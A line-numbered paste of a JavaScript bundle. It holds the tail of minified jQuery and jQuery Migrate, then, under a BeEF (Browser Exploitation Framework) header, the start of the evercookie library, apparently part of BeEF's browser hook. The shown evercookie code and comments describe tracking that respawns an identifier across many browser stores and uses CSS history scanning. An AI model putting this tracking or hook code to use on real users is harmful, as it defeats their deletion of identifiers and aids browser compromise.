c,y,v,w,T,N=n;2!==b&&(b=2,s&&clearTimeout(s),u=t,a=i||"",C.readyState=e>0?4:0,c=e>=200&&300>e||304===e,r&&(w=Mn(p,C,r)),w=On(p,w,C,c),c?(p.ifModified&&(T=C.getResponseHeader("Last-Modified"),T&&(x.lastModified[o]=T),T=C.getResponseHeader("etag"),T&&(x.etag[o]=T)),204===e||"HEAD"===p.type?N="nocontent":304===e?N="notmodified":(N=w.state,y=w.data,v=w.error,c=!v)):(v=N,(e||!N)&&(N="error",0>e&&(e=0))),C.status=e,C.statusText=(n||N)+"",c?h.resolveWith(f,[y,N,C]):h.rejectWith(f,[C,N,v]),C.statusCode(m),m=t,l&&d.trigger(c?"ajaxSuccess":"ajaxError",[C,p,c?y:v]),g.fireWith(f,[C,N]),l&&(d.trigger("ajaxComplete",[C,p]),--x.active||x.event.trigger("ajaxStop")))}return C},getJSON:function(e,t,n){return x.get(e,t,n,"json")},getScript:function(e,n){return x.get(e,t,n,"script")}}),x.each(["get","post"],function(e,n){x[n]=function(e,r,i,o){return x.isFunction(r)&&(o=o||i,i=r,r=t),x.ajax({url:e,type:n,dataType:o,data:r,success:i})}});function Mn(e,n,r){var i,o,a,s,l=e.contents,u=e.dataTypes;while("*"===u[0])u.shift(),o===t&&(o=e.mimeType||n.getResponseHeader("Content-Type"));if(o)for(s in l)if(l[s]&&l[s].test(o)){u.unshift(s);break}if(u[0]in r)a=u[0];else{for(s in r){if(!u[0]||e.converters[s+" "+u[0]]){a=s;break}i||(i=s)}a=a||i}return a?(a!==u[0]&&u.unshift(a),r[a]):t}function On(e,t,n,r){var i,o,a,s,l,u={},c=e.dataTypes.slice();if(c[1])for(a in e.converters)u[a.toLowerCase()]=e.converters[a];o=c.shift();while(o)if(e.responseFields[o]&&(n[e.responseFields[o]]=t),!l&&r&&e.dataFilter&&(t=e.dataFilter(t,e.dataType)),l=o,o=c.shift())if("*"===o)o=l;else if("*"!==l&&l!==o){if(a=u[l+" "+o]||u["* "+o],!a)for(i in u)if(s=i.split(" "),s[1]===o&&(a=u[l+" "+s[0]]||u["* "+s[0]])){a===!0?a=u[i]:u[i]!==!0&&(o=s[0],c.unshift(s[1]));break}if(a!==!0)if(a&&e["throws"])t=a(t);else try{t=a(t)}catch(p){return{state:"parsererror",error:a?p:"No conversion from "+l+" to "+o}}}return{state:"success",data:t}}x.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(e){return x.globalEval(e),e}}}),x.ajaxPrefilter("script",function(e){e.cache===t&&(e.cache=!1),e.crossDomain&&(e.type="GET",e.global=!1)}),x.ajaxTransport("script",function(e){if(e.crossDomain){var n,r=a.head||x("head")[0]||a.documentElement;return{send:function(t,i){n=a.createElement("script"),n.async=!0,e.scriptCharset&&(n.charset=e.scriptCharset),n.src=e.url,n.onload=n.onreadystatechange=function(e,t){(t||!n.readyState||/loaded|complete/.test(n.readyState))&&(n.onload=n.onreadystatechange=null,n.parentNode&&n.parentNode.removeChild(n),n=null,t||i(200,"success"))},r.insertBefore(n,r.firstChild)},abort:function(){n&&n.onload(t,!0)}}}});var Fn=[],Bn=/(=)\?(?=&|$)|\?\?/;x.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=Fn.pop()||x.expando+"_"+vn++;return this[e]=!0,e}}),x.ajaxPrefilter("json jsonp",function(n,r,i){var o,a,s,l=n.jsonp!==!1&&(Bn.test(n.url)?"url":"string"==typeof n.data&&!(n.contentType||"").indexOf("application/x-www-form-urlencoded")&&Bn.test(n.data)&&"data");return l||"jsonp"===n.dataTypes[0]?(o=n.jsonpCallback=x.isFunction(n.jsonpCallback)?n.jsonpCallback():n.jsonpCallback,l?n[l]=n[l].replace(Bn,"$1"+o):n.jsonp!==!1&&(n.url+=(bn.test(n.url)?"&":"?")+n.jsonp+"="+o),n.converters["script json"]=function(){return s||x.error(o+" was not called"),s[0]},n.dataTypes[0]="json",a=e[o],e[o]=function(){s=arguments},i.always(function(){e[o]=a,n[o]&&(n.jsonpCallback=r.jsonpCallback,Fn.push(o)),s&&x.isFunction(a)&&a(s[0]),s=a=t}),"script"):t});var Pn,Rn,Wn=0,$n=e.ActiveXObject&&function(){var e;for(e in Pn)Pn[e](t,!0)};function In(){try{return new e.XMLHttpRequest}catch(t){}}function zn(){try{return new e.ActiveXObject("Microsoft.XMLHTTP")}catch(t){}}x.ajaxSettings.xhr=e.ActiveXObject?function(){return!this.isLocal&&In()||zn()}:In,Rn=x.ajaxSettings.xhr(),x.support.cors=!!Rn&&"withCredentials"in Rn,Rn=x.support.ajax=!!Rn,Rn&&x.ajaxTransport(function(n){if(!n.crossDomain||x.support.cors){var r;return{send:function(i,o){var a,s,l=n.xhr();if(n.username?l.open(n.type,n.url,n.async,n.username,n.password):l.open(n.type,n.url,n.async),n.xhrFields)for(s in n.xhrFields)l[s]=n.xhrFields[s];n.mimeType&&l.overrideMimeType&&l.overrideMimeType(n.mimeType),n.crossDomain||i["X-Requested-With"]||(i["X-Requested-With"]="XMLHttpRequest");try{for(s in i)l.setRequestHeader(s,i[s])}catch(u){}l.send(n.hasContent&&n.data||null),r=function(e,i){var s,u,c,p;try{if(r&&(i||4===l.readyState))if(r=t,a&&(l.onreadystatechange=x.noop,$n&&delete Pn[a]),i)4!==l.readyState&&l.abort();else{p={},s=l.status,u=l.getAllResponseHeaders(),"string"==typeof l.responseText&&(p.text=l.responseText);try{c=l.statusText}catch(f){c=""}s||!n.isLocal||n.crossDomain?1223===s&&(s=204):s=p.text?200:404}}catch(d){i||o(-1,d)}p&&o(s,c,p,u)},n.async?4===l.readyState?setTimeout(r):(a=++Wn,$n&&(Pn||(Pn={},x(e).unload($n)),Pn[a]=r),l.onreadystatechange=r):r()},abort:function(){r&&r(t,!0)}}}});var Xn,Un,Vn=/^(?:toggle|show|hide)$/,Yn=RegExp("^(?:([+-])=|)("+w+")([a-z%]*)$","i"),Jn=/queueHooks$/,Gn=[nr],Qn={"*":[function(e,t){var n=this.createTween(e,t),r=n.cur(),i=Yn.exec(t),o=i&&i[3]||(x.cssNumber[e]?"":"px"),a=(x.cssNumber[e]||"px"!==o&&+r)&&Yn.exec(x.css(n.elem,e)),s=1,l=20;if(a&&a[3]!==o){o=o||a[3],i=i||[],a=+r||1;do s=s||".5",a/=s,x.style(n.elem,e,a+o);while(s!==(s=n.cur()/r)&&1!==s&&--l)}return i&&(a=n.start=+a||+r||0,n.unit=o,n.end=i[1]?a+(i[1]+1)*i[2]:+i[2]),n}]};function Kn(){return setTimeout(function(){Xn=t}),Xn=x.now()}function Zn(e,t,n){var r,i=(Qn[t]||[]).concat(Qn["*"]),o=0,a=i.length;for(;a>o;o++)if(r=i[o].call(n,t,e))return r}function er(e,t,n){var r,i,o=0,a=Gn.length,s=x.Deferred().always(function(){delete l.elem}),l=function(){if(i)return!1;var t=Xn||Kn(),n=Math.max(0,u.startTime+u.duration-t),r=n/u.duration||0,o=1-r,a=0,l=u.tweens.length;for(;l>a;a++)u.tweens[a].run(o);return s.notifyWith(e,[u,o,n]),1>o&&l?n:(s.resolveWith(e,[u]),!1)},u=s.promise({elem:e,props:x.extend({},t),opts:x.extend(!0,{specialEasing:{}},n),originalProperties:t,originalOptions:n,startTime:Xn||Kn(),duration:n.duration,tweens:[],createTween:function(t,n){var r=x.Tween(e,u.opts,t,n,u.opts.specialEasing[t]||u.opts.easing);return u.tweens.push(r),r},stop:function(t){var n=0,r=t?u.tweens.length:0;if(i)return this;for(i=!0;r>n;n++)u.tweens[n].run(1);return t?s.resolveWith(e,[u,t]):s.rejectWith(e,[u,t]),this}}),c=u.props;for(tr(c,u.opts.specialEasing);a>o;o++)if(r=Gn[o].call(u,e,c,u.opts))return r;return x.map(c,Zn,u),x.isFunction(u.opts.start)&&u.opts.start.call(e,u),x.fx.timer(x.extend(l,{elem:e,anim:u,queue:u.opts.queue})),u.progress(u.opts.progress).done(u.opts.done,u.opts.complete).fail(u.opts.fail).always(u.opts.always)}function tr(e,t){var n,r,i,o,a;for(n in e)if(r=x.camelCase(n),i=t[r],o=e[n],x.isArray(o)&&(i=o[1],o=e[n]=o[0]),n!==r&&(e[r]=o,delete e[n]),a=x.cssHooks[r],a&&"expand"in a){o=a.expand(o),delete e[r];for(n in o)n in e||(e[n]=o[n],t[n]=i)}else t[r]=i}x.Animation=x.extend(er,{tweener:function(e,t){x.isFunction(e)?(t=e,e=["*"]):e=e.split(" ");var n,r=0,i=e.length;for(;i>r;r++)n=e[r],Qn[n]=Qn[n]||[],Qn[n].unshift(t)},prefilter:function(e,t){t?Gn.unshift(e):Gn.push(e)}});function nr(e,t,n){var r,i,o,a,s,l,u=this,c={},p=e.style,f=e.nodeType&&nn(e),d=x._data(e,"fxshow");n.queue||(s=x._queueHooks(e,"fx"),null==s.unqueued&&(s.unqueued=0,l=s.empty.fire,s.empty.fire=function(){s.unqueued||l()}),s.unqueued++,u.always(function(){u.always(function(){s.unqueued--,x.queue(e,"fx").length||s.empty.fire()})})),1===e.nodeType&&("height"in t||"width"in t)&&(n.overflow=[p.overflow,p.overflowX,p.overflowY],"inline"===x.css(e,"display")&&"none"===x.css(e,"float")&&(x.support.inlineBlockNeedsLayout&&"inline"!==ln(e.nodeName)?p.zoom=1:p.display="inline-block")),n.overflow&&(p.overflow="hidden",x.support.shrinkWrapBlocks||u.always(function(){p.overflow=n.overflow[0],p.overflowX=n.overflow[1],p.overflowY=n.overflow[2]}));for(r in t)if(i=t[r],Vn.exec(i)){if(delete t[r],o=o||"toggle"===i,i===(f?"hide":"show"))continue;c[r]=d&&d[r]||x.style(e,r)}if(!x.isEmptyObject(c)){d?"hidden"in d&&(f=d.hidden):d=x._data(e,"fxshow",{}),o&&(d.hidden=!f),f?x(e).show():u.done(function(){x(e).hide()}),u.done(function(){var t;x._removeData(e,"fxshow");for(t in c)x.style(e,t,c[t])});for(r in c)a=Zn(f?d[r]:0,r,u),r in d||(d[r]=a.start,f&&(a.end=a.start,a.start="width"===r||"height"===r?1:0))}}function rr(e,t,n,r,i){return new rr.prototype.init(e,t,n,r,i)}x.Tween=rr,rr.prototype={constructor:rr,init:function(e,t,n,r,i,o){this.elem=e,this.prop=n,this.easing=i||"swing",this.options=t,this.start=this.now=this.cur(),this.end=r,this.unit=o||(x.cssNumber[n]?"":"px")},cur:function(){var e=rr.propHooks[this.prop];return e&&e.get?e.get(this):rr.propHooks._default.get(this)},run:function(e){var t,n=rr.propHooks[this.prop];return this.pos=t=this.options.duration?x.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):rr.propHooks._default.set(this),this}},rr.prototype.init.prototype=rr.prototype,rr.propHooks={_default:{get:function(e){var t;return null==e.elem[e.prop]||e.elem.style&&null!=e.elem.style[e.prop]?(t=x.css(e.elem,e.prop,""),t&&"auto"!==t?t:0):e.elem[e.prop]},set:function(e){x.fx.step[e.prop]?x.fx.step[e.prop](e):e.elem.style&&(null!=e.elem.style[x.cssProps[e.prop]]||x.cssHooks[e.prop])?x.style(e.elem,e.prop,e.now+e.unit):e.elem[e.prop]=e.now}}},rr.propHooks.scrollTop=rr.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},x.each(["toggle","show","hide"],function(e,t){var n=x.fn[t];x.fn[t]=function(e,r,i){return null==e||"boolean"==typeof e?n.apply(this,arguments):this.animate(ir(t,!0),e,r,i)}}),x.fn.extend({fadeTo:function(e,t,n,r){return this.filter(nn).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(e,t,n,r){var i=x.isEmptyObject(e),o=x.speed(t,n,r),a=function(){var t=er(this,x.extend({},e),o);(i||x._data(this,"finish"))&&t.stop(!0)};return a.finish=a,i||o.queue===!1?this.each(a):this.queue(o.queue,a)},stop:function(e,n,r){var i=function(e){var t=e.stop;delete e.stop,t(r)};return"string"!=typeof e&&(r=n,n=e,e=t),n&&e!==!1&&this.queue(e||"fx",[]),this.each(function(){var t=!0,n=null!=e&&e+"queueHooks",o=x.timers,a=x._data(this);if(n)a[n]&&a[n].stop&&i(a[n]);else for(n in a)a[n]&&a[n].stop&&Jn.test(n)&&i(a[n]);for(n=o.length;n--;)o[n].elem!==this||null!=e&&o[n].queue!==e||(o[n].anim.stop(r),t=!1,o.splice(n,1));(t||!r)&&x.dequeue(this,e)})},finish:function(e){return e!==!1&&(e=e||"fx"),this.each(function(){var t,n=x._data(this),r=n[e+"queue"],i=n[e+"queueHooks"],o=x.timers,a=r?r.length:0;for(n.finish=!0,x.queue(this,e,[]),i&&i.stop&&i.stop.call(this,!0),t=o.length;t--;)o[t].elem===this&&o[t].queue===e&&(o[t].anim.stop(!0),o.splice(t,1));for(t=0;a>t;t++)r[t]&&r[t].finish&&r[t].finish.call(this);delete n.finish})}});function ir(e,t){var n,r={height:e},i=0;for(t=t?1:0;4>i;i+=2-t)n=Zt[i],r["margin"+n]=r["padding"+n]=e;return t&&(r.opacity=r.width=e),r}x.each({slideDown:ir("show"),slideUp:ir("hide"),slideToggle:ir("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){x.fn[e]=function(e,n,r){return this.animate(t,e,n,r)}}),x.speed=function(e,t,n){var r=e&&"object"==typeof e?x.extend({},e):{complete:n||!n&&t||x.isFunction(e)&&e,duration:e,easing:n&&t||t&&!x.isFunction(t)&&t};return r.duration=x.fx.off?0:"number"==typeof r.duration?r.duration:r.duration in x.fx.speeds?x.fx.speeds[r.duration]:x.fx.speeds._default,(null==r.queue||r.queue===!0)&&(r.queue="fx"),r.old=r.complete,r.complete=function(){x.isFunction(r.old)&&r.old.call(this),r.queue&&x.dequeue(this,r.queue)},r},x.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2}},x.timers=[],x.fx=rr.prototype.init,x.fx.tick=function(){var e,n=x.timers,r=0;for(Xn=x.now();n.length>r;r++)e=n[r],e()||n[r]!==e||n.splice(r--,1);n.length||x.fx.stop(),Xn=t},x.fx.timer=function(e){e()&&x.timers.push(e)&&x.fx.start()},x.fx.interval=13,x.fx.start=function(){Un||(Un=setInterval(x.fx.tick,x.fx.interval))},x.fx.stop=function(){clearInterval(Un),Un=null},x.fx.speeds={slow:600,fast:200,_default:400},x.fx.step={},x.expr&&x.expr.filters&&(x.expr.filters.animated=function(e){return x.grep(x.timers,function(t){return e===t.elem}).length}),x.fn.offset=function(e){if(arguments.length)return e===t?this:this.each(function(t){x.offset.setOffset(this,e,t)});var n,r,o={top:0,left:0},a=this[0],s=a&&a.ownerDocument;if(s)return n=s.documentElement,x.contains(n,a)?(typeof a.getBoundingClientRect!==i&&(o=a.getBoundingClientRect()),r=or(s),{top:o.top+(r.pageYOffset||n.scrollTop)-(n.clientTop||0),left:o.left+(r.pageXOffset||n.scrollLeft)-(n.clientLeft||0)}):o},x.offset={setOffset:function(e,t,n){var r=x.css(e,"position");"static"===r&&(e.style.position="relative");var i=x(e),o=i.offset(),a=x.css(e,"top"),s=x.css(e,"left"),l=("absolute"===r||"fixed"===r)&&x.inArray("auto",[a,s])>-1,u={},c={},p,f;l?(c=i.position(),p=c.top,f=c.left):(p=parseFloat(a)||0,f=parseFloat(s)||0),x.isFunction(t)&&(t=t.call(e,n,o)),null!=t.top&&(u.top=t.top-o.top+p),null!=t.left&&(u.left=t.left-o.left+f),"using"in t?t.using.call(e,u):i.css(u)}},x.fn.extend({position:function(){if(this[0]){var e,t,n={top:0,left:0},r=this[0];return"fixed"===x.css(r,"position")?t=r.getBoundingClientRect():(e=this.offsetParent(),t=this.offset(),x.nodeName(e[0],"html")||(n=e.offset()),n.top+=x.css(e[0],"borderTopWidth",!0),n.left+=x.css(e[0],"borderLeftWidth",!0)),{top:t.top-n.top-x.css(r,"marginTop",!0),left:t.left-n.left-x.css(r,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var e=this.offsetParent||s;while(e&&!x.nodeName(e,"html")&&"static"===x.css(e,"position"))e=e.offsetParent;return e||s})}}),x.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,n){var r=/Y/.test(n);x.fn[e]=function(i){return x.access(this,function(e,i,o){var a=or(e);return o===t?a?n in a?a[n]:a.document.documentElement[i]:e[i]:(a?a.scrollTo(r?x(a).scrollLeft():o,r?o:x(a).scrollTop()):e[i]=o,t)},e,i,arguments.length,null)}});function or(e){return x.isWindow(e)?e:9===e.nodeType?e.defaultView||e.parentWindow:!1}x.each({Height:"height",Width:"width"},function(e,n){x.each({padding:"inner"+e,content:n,"":"outer"+e},function(r,i){x.fn[i]=function(i,o){var a=arguments.length&&(r||"boolean"!=typeof i),s=r||(i===!0||o===!0?"margin":"border");return x.access(this,function(n,r,i){var o;return x.isWindow(n)?n.document.documentElement["client"+e]:9===n.nodeType?(o=n.documentElement,Math.max(n.body["scroll"+e],o["scroll"+e],n.body["offset"+e],o["offset"+e],o["client"+e])):i===t?x.css(n,r,s):x.style(n,r,i,s)},n,a?i:t,a,null)}})}),x.fn.size=function(){return this.length},x.fn.andSelf=x.fn.addBack,"object"==typeof module&&module&&"object"==typeof module.exports?module.exports=x:(e.jQuery=e.$=x,"function"==typeof define&&define.amd&&define("jquery",[],function(){return x}))})(window);
  7.  
  8.  
  9. /*! jQuery Migrate v1.2.1 | (c) 2005, 2013 jQuery Foundation, Inc. and other contributors | jquery.org/license */
  10. jQuery.migrateMute===void 0&&(jQuery.migrateMute=!0),function(e,t,n){function r(n){var r=t.console;i[n]||(i[n]=!0,e.migrateWarnings.push(n),r&&r.warn&&!e.migrateMute&&(r.warn("JQMIGRATE: "+n),e.migrateTrace&&r.trace&&r.trace()))}function a(t,a,i,o){if(Object.defineProperty)try{return Object.defineProperty(t,a,{configurable:!0,enumerable:!0,get:function(){return r(o),i},set:function(e){r(o),i=e}}),n}catch(s){}e._definePropertyBroken=!0,t[a]=i}var i={};e.migrateWarnings=[],!e.migrateMute&&t.console&&t.console.log&&t.console.log("JQMIGRATE: Logging is active"),e.migrateTrace===n&&(e.migrateTrace=!0),e.migrateReset=function(){i={},e.migrateWarnings.length=0},"BackCompat"===document.compatMode&&r("jQuery is not compatible with Quirks Mode");var o=e("<input/>",{size:1}).attr("size")&&e.attrFn,s=e.attr,u=e.attrHooks.value&&e.attrHooks.value.get||function(){return null},c=e.attrHooks.value&&e.attrHooks.value.set||function(){return n},l=/^(?:input|button)$/i,d=/^[238]$/,p=/^(?:autofocus|autoplay|async|checked|controls|defer|disabled|hidden|loop|multiple|open|readonly|required|scoped|selected)$/i,f=/^(?:checked|selected)$/i;a(e,"attrFn",o||{},"jQuery.attrFn is deprecated"),e.attr=function(t,a,i,u){var c=a.toLowerCase(),g=t&&t.nodeType;return u&&(4>s.length&&r("jQuery.fn.attr( props, pass ) is deprecated"),t&&!d.test(g)&&(o?a in o:e.isFunction(e.fn[a])))?e(t)[a](i):("type"===a&&i!==n&&l.test(t.nodeName)&&t.parentNode&&r("Can't change the 'type' of an input or button in IE 6/7/8"),!e.attrHooks[c]&&p.test(c)&&(e.attrHooks[c]={get:function(t,r){var a,i=e.prop(t,r);return i===!0||"boolean"!=typeof i&&(a=t.getAttributeNode(r))&&a.nodeValue!==!1?r.toLowerCase():n},set:function(t,n,r){var a;return n===!1?e.removeAttr(t,r):(a=e.propFix[r]||r,a in t&&(t[a]=!0),t.setAttribute(r,r.toLowerCase())),r}},f.test(c)&&r("jQuery.fn.attr('"+c+"') may use property instead of attribute")),s.call(e,t,a,i))},e.attrHooks.value={get:function(e,t){var n=(e.nodeName||"").toLowerCase();return"button"===n?u.apply(this,arguments):("input"!==n&&"option"!==n&&r("jQuery.fn.attr('value') no longer gets properties"),t in e?e.value:null)},set:function(e,t){var a=(e.nodeName||"").toLowerCase();return"button"===a?c.apply(this,arguments):("input"!==a&&"option"!==a&&r("jQuery.fn.attr('value', val) no longer sets properties"),e.value=t,n)}};var g,h,v=e.fn.init,m=e.parseJSON,y=/^([^<]*)(<[\w\W]+>)([^>]*)$/;e.fn.init=function(t,n,a){var i;return t&&"string"==typeof t&&!e.isPlainObject(n)&&(i=y.exec(e.trim(t)))&&i[0]&&("<"!==t.charAt(0)&&r("$(html) HTML strings must start with '<' character"),i[3]&&r("$(html) HTML text after last tag is ignored"),"#"===i[0].charAt(0)&&(r("HTML string cannot start with a '#' character"),e.error("JQMIGRATE: Invalid selector string (XSS)")),n&&n.context&&(n=n.context),e.parseHTML)?v.call(this,e.parseHTML(i[2],n,!0),n,a):v.apply(this,arguments)},e.fn.init.prototype=e.fn,e.parseJSON=function(e){return e||null===e?m.apply(this,arguments):(r("jQuery.parseJSON requires a valid JSON string"),null)},e.uaMatch=function(e){e=e.toLowerCase();var t=/(chrome)[ \/]([\w.]+)/.exec(e)||/(webkit)[ \/]([\w.]+)/.exec(e)||/(opera)(?:.*version|)[ \/]([\w.]+)/.exec(e)||/(msie) ([\w.]+)/.exec(e)||0>e.indexOf("compatible")&&/(mozilla)(?:.*? rv:([\w.]+)|)/.exec(e)||[];return{browser:t[1]||"",version:t[2]||"0"}},e.browser||(g=e.uaMatch(navigator.userAgent),h={},g.browser&&(h[g.browser]=!0,h.version=g.version),h.chrome?h.webkit=!0:h.webkit&&(h.safari=!0),e.browser=h),a(e,"browser",e.browser,"jQuery.browser is deprecated"),e.sub=function(){function t(e,n){return new t.fn.init(e,n)}e.extend(!0,t,this),t.superclass=this,t.fn=t.prototype=this(),t.fn.constructor=t,t.sub=this.sub,t.fn.init=function(r,a){return a&&a instanceof e&&!(a instanceof t)&&(a=t(a)),e.fn.init.call(this,r,a,n)},t.fn.init.prototype=t.fn;var n=t(document);return r("jQuery.sub() is deprecated"),t},e.ajaxSetup({converters:{"text json":e.parseJSON}});var b=e.fn.data;e.fn.data=function(t){var a,i,o=this[0];return!o||"events"!==t||1!==arguments.length||(a=e.data(o,t),i=e._data(o,t),a!==n&&a!==i||i===n)?b.apply(this,arguments):(r("Use of jQuery.fn.data('events') is deprecated"),i)};var j=/\/(java|ecma)script/i,w=e.fn.andSelf||e.fn.addBack;e.fn.andSelf=function(){return r("jQuery.fn.andSelf() replaced by jQuery.fn.addBack()"),w.apply(this,arguments)},e.clean||(e.clean=function(t,a,i,o){a=a||document,a=!a.nodeType&&a[0]||a,a=a.ownerDocument||a,r("jQuery.clean() is deprecated");var s,u,c,l,d=[];if(e.merge(d,e.buildFragment(t,a).childNodes),i)for(c=function(e){return!e.type||j.test(e.type)?o?o.push(e.parentNode?e.parentNode.removeChild(e):e):i.appendChild(e):n},s=0;null!=(u=d[s]);s++)e.nodeName(u,"script")&&c(u)||(i.appendChild(u),u.getElementsByTagName!==n&&(l=e.grep(e.merge([],u.getElementsByTagName("script")),c),d.splice.apply(d,[s+1,0].concat(l)),s+=l.length));return d});var Q=e.event.add,x=e.event.remove,k=e.event.trigger,N=e.fn.toggle,T=e.fn.live,M=e.fn.die,S="ajaxStart|ajaxStop|ajaxSend|ajaxComplete|ajaxError|ajaxSuccess",C=RegExp("\\b(?:"+S+")\\b"),H=/(?:^|\s)hover(\.\S+|)\b/,A=function(t){return"string"!=typeof t||e.event.special.hover?t:(H.test(t)&&r("'hover' pseudo-event is deprecated, use 'mouseenter mouseleave'"),t&&t.replace(H,"mouseenter$1 mouseleave$1"))};e.event.props&&"attrChange"!==e.event.props[0]&&e.event.props.unshift("attrChange","attrName","relatedNode","srcElement"),e.event.dispatch&&a(e.event,"handle",e.event.dispatch,"jQuery.event.handle is undocumented and deprecated"),e.event.add=function(e,t,n,a,i){e!==document&&C.test(t)&&r("AJAX events should be attached to document: "+t),Q.call(this,e,A(t||""),n,a,i)},e.event.remove=function(e,t,n,r,a){x.call(this,e,A(t)||"",n,r,a)},e.fn.error=function(){var e=Array.prototype.slice.call(arguments,0);return r("jQuery.fn.error() is deprecated"),e.splice(0,0,"error"),arguments.length?this.bind.apply(this,e):(this.triggerHandler.apply(this,e),this)},e.fn.toggle=function(t,n){if(!e.isFunction(t)||!e.isFunction(n))return N.apply(this,arguments);r("jQuery.fn.toggle(handler, handler...) is deprecated");var a=arguments,i=t.guid||e.guid++,o=0,s=function(n){var r=(e._data(this,"lastToggle"+t.guid)||0)%o;return e._data(this,"lastToggle"+t.guid,r+1),n.preventDefault(),a[r].apply(this,arguments)||!1};for(s.guid=i;a.length>o;)a[o++].guid=i;return this.click(s)},e.fn.live=function(t,n,a){return r("jQuery.fn.live() is deprecated"),T?T.apply(this,arguments):(e(this.context).on(t,this.selector,n,a),this)},e.fn.die=function(t,n){return r("jQuery.fn.die() is deprecated"),M?M.apply(this,arguments):(e(this.context).off(t,this.selector||"**",n),this)},e.event.trigger=function(e,t,n,a){return n||C.test(e)||r("Global events are undocumented and deprecated"),k.call(this,e,t,n||document,a)},e.each(S.split("|"),function(t,n){e.event.special[n]={setup:function(){var t=this;return t!==document&&(e.event.add(document,n+"."+e.guid,function(){e.event.trigger(n,null,t,!0)}),e._data(this,n,e.guid++)),!1},teardown:function(){return this!==document&&e.event.remove(document,n+"."+e._data(this,n)),!1}}})}(jQuery,window);
  11.  
  12.  
  13. //
  14. // Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
  15. // Browser Exploitation Framework (BeEF) - http://beefproject.com
  16. // See the file 'doc/COPYING' for copying permission
  17. //
  18.  
  19. /*
  20. * evercookie 0.4 (10/13/2010) -- extremely persistent cookies
  21. *
  22. * by samy kamkar : code@samy.pl : http://samy.pl
  23. *
  24. * this api attempts to produce several types of persistent data
  25. * to essentially make a cookie virtually irrevocable from a system
  26. *
  27. * specifically it uses:
  28. * - standard http cookies
  29. * - flash cookies (local shared objects)
  30. * - silverlight isolated storage
  31. * - png generation w/forced cache and html5 canvas pixel reading
  32. * - http etags
  33. * - http cache
  34. * - window.name
  35. * - IE userData
  36. * - html5 session cookies
  37. * - html5 local storage
  38. * - html5 global storage
  39. * - html5 database storage via sqlite
  40. * - css history scanning
  41. *
  42. * if any cookie is found, it's then reset to all the other locations
  43. * for example, if someone deletes all but one type of cookie, once
  44. * that cookie is re-discovered, all of the other cookie types get reset
  45. *
  46. * !!! SOME OF THESE ARE CROSS-DOMAIN COOKIES, THIS MEANS
  47. * OTHER SITES WILL BE ABLE TO READ SOME OF THESE COOKIES !!!
  48. *
  49. * USAGE:
  50.  
  51. var ec = new evercookie();
  52.  
  53. // set a cookie "id" to "12345"
  54. // usage: ec.set(key, value)
  55. ec.set("id", "12345");
  56.  
  57. // retrieve a cookie called "id" (simply)
  58. ec.get("id", function(value) { alert("Cookie value is " + value) });
  59.  
  60. // or use a more advanced callback function for getting our cookie
  61. // the cookie value is the first param
  62. // an object containing the different storage methods
  63. // and returned cookie values is the second parameter
  64. function getCookie(best_candidate, all_candidates)
  65. {
  66. alert("The retrieved cookie is: " + best_candidate + "\n" +
  67. "You can see what each storage mechanism returned " +
  68. "by looping through the all_candidates object.");
  69.  
  70. for (var item in all_candidates)
  71. document.write("Storage mechanism " + item +
  72. " returned " + all_candidates[item] + " votes<br>");
  73. }
  74. ec.get("id", getCookie);
  75.  
  76. // we look for "candidates" based off the number of "cookies" that
  77. // come back matching since it's possible for mismatching cookies.
  78. // the best candidate is very-very-likely the correct one
  79.  
  80. */
  81.  
  82. /* to turn off CSS history knocking, set _ec_history to 0 */
  83. var _ec_history = 1; // CSS history knocking or not .. can be network intensive
  84. var _ec_tests = 10;//1000;
  85. var _ec_debug = 0;
  86.  
  87. function _ec_dump(arr, level)
  88. {
  89. var dumped_text = "";
  90. if(!level) level = 0;
  91.  
  92. //The padding given at the beginning of the line.
  93. var level_padding = "";
  94. for(var j=0;j<level+1;j++) level_padding += " ";
  95.  
  96. if(typeof(arr) == 'object') { //Array/Hashes/Objects
  97. for(var item in arr) {
  98. var value = arr[item];
  99.  
  100. if(typeof(value) == 'object') { //If it is an array,
  101. dumped_text += level_padding + "'" + item + "' ...\n";
  102. dumped_text += _ec_dump(value,level+1);
  103. } else {
  104. dumped_text += level_padding + "'" + item + "' => \"" + value + "\"\n";
  105. }
  106. }
  107. } else { //Stings/Chars/Numbers etc.
  108. dumped_text = "===>"+arr+"<===("+typeof(arr)+")";
  109. }
  110. return dumped_text;
  111. }
  112.  
  113. function _ec_replace(str, key, value)
  114. {
  115. if (str.indexOf('&' + key + '=') > -1 || str.indexOf(key + '=') == 0)
  116. {
  117. // find start
  118. var idx = str.indexOf('&' + key + '=');
  119. if (idx == -1)
  120. idx = str.indexOf(key + '=');
  121.  
  122. // find end
  123. var end = str.indexOf('&', idx + 1);
  124. var newstr;
  125. if (end != -1)
  126. newstr = str.substr(0, idx) + str.substr(end + (idx ? 0 : 1)) + '&' + key + '=' + value;
  127. else
  128. newstr = str.substr(0, idx) + '&' + key + '=' + value;
  129.  
  130. return newstr;
  131. }
  132. else
  133. return str + '&' + key + '=' + value;
  134. }
  135.  
  136.  
  137. // necessary for flash to communicate with js...
  138. // please implement a better way
  139. var _global_lso;
  140. function _evercookie_flash_var(cookie)
  141. {
  142. _global_lso = cookie;
  143.  
  144. // remove the flash object now
  145. var swf = $('#myswf');
  146. if (swf && swf.parentNode)
  147. swf.parentNode.removeChild(swf);
  148. }
  149.  
  150. var evercookie = (function () {
  151. this._class = function() {
  152.  
  153. var self = this;
  154. // private property
  155. _baseKeyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  156. this._ec = {};
  157. var no_color = -1;
  158.  
  159. this.get = function(name, cb, dont_reset)
  160. {
  161. $(document).ready(function() {
